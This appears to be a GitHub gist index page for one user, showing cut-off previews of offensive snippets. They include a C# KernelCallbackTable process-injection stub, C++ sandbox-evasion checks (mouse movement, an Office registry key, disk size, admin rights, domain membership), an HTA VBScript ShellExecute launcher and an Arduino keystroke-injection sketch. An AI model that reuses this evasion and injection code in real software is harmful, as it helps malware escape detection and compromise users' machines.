Boschko OlivierLaflamme
OlivierLaflamme
/ kernelcallback.cs
Created
December 31, 2021 03:30
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| namespace SendMessageKernelCallback | |
| { | |
| /*References: | |
| * 1. https://t0rchwo0d.github.io/windows/Windows-Process-Injection-Technique-KernelCallbackTable/ | |
| * 2. https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/ | |
| */ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from z3 import * | |
| # 9x9 matrix of integer variables | |
| X = [ [ Int("x_%s_%s" % (i+1, j+1)) for j in range(9) ] | |
| for i in range(9) ] | |
| s = Solver() | |
| # A --> 0 | |
| # B --> 1 |
OlivierLaflamme
/ dontfuckup.cpp
Last active
January 24, 2022 16:04
Check to see if mouse is moving change sleep accordingly e.g., 13000 means if user doesn't move mouse for 13 seconds, payload will not execute
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| bool checkMousePosition() | |
| { | |
| POINT pos1, pos2; | |
| GetCursorPos(&pos1); | |
| Sleep(13000); | |
| GetCursorPos(&pos2); | |
| if ((pos1.x == pos2.x) && (pos1.y == pos2.y)) | |
| { | |
| return false; | |
| } |
OlivierLaflamme
/ mork.cpp
Last active
January 24, 2022 16:04
Check for Microsoft Office Registry Key
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BOOL chkOfficeRegKey() { | |
| HKEY hkResult = NULL; | |
| TCHAR lpSubKey[] = L"SOFTWARE\\Microsoft\\Office"; | |
| HKEY hKey = HKEY_CURRENT_USER; | |
| if (RegOpenKeyEx(hKey, lpSubKey, NULL, KEY_ALL_ACCESS, &hkResult) == ERROR_SUCCESS) | |
| { | |
| return true; | |
| } | |
| else | |
| return false; |
OlivierLaflamme
/ greaterthen100GinC.cpp
Last active
January 24, 2022 16:04
Check to see if user has greater than 100GB in C drive
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| bool isDiskSpaceAvailable() | |
| { | |
| // Disk size | |
| // We are using GetDiskFreeSpaceExA | |
| // Retrieves information about the amount of space that is available on a disk volume, | |
| // which is the total amount of space, the total amount of free space, and the total | |
| // amount of free space available to the user that is associated with the calling thread. | |
| // https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-getdiskfreespaceexa | |
| ULARGE_INTEGER iFreeBytesAvailableToCaller, iTotalNumberOfBytes, iTotalNumberOfFreeBytes; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| bool isAdmin() | |
| { | |
| if (IsUserAnAdmin()) | |
| { | |
| return false; | |
| } | |
| return true; | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| bool isPartofDomain() | |
| { | |
| NET_API_STATUS nas; | |
| _NETSETUP_JOIN_STATUS status; | |
| LPWSTR buf = NULL; | |
| nas = NetGetJoinInformation(NULL, &buf, &status); | |
| if (nas == NERR_Success) | |
| { | |
| if (status == NetSetupDomain) | |
| { |
OlivierLaflamme
/ run.cs
Created
January 24, 2022 16:06
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| using System.Text.RegularExpressions; | |
| namespace GetDisplayInformation | |
| { | |
| class Program | |
| { | |
| [DllImport("user32.dll", CharSet = CharSet.Auto)] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script language="VBScript"> | |
| Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880") | |
| obj.Document.Application.ShellExecute "calc.exe",Null,"C:\Windows\System32",Null,0 | |
| self.close | |
| </script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <HID.h> | |
| #include <Keyboard.h> | |
| void setup() {//initialization | |
| Keyboard.begin();//Start keyboard communication | |
| delay(5000);//delay | |
| Keyboard.press(KEY_LEFT_GUI);//win key | |
| delay(500); | |
| Keyboard.press('r');//r key | |
| delay(500); |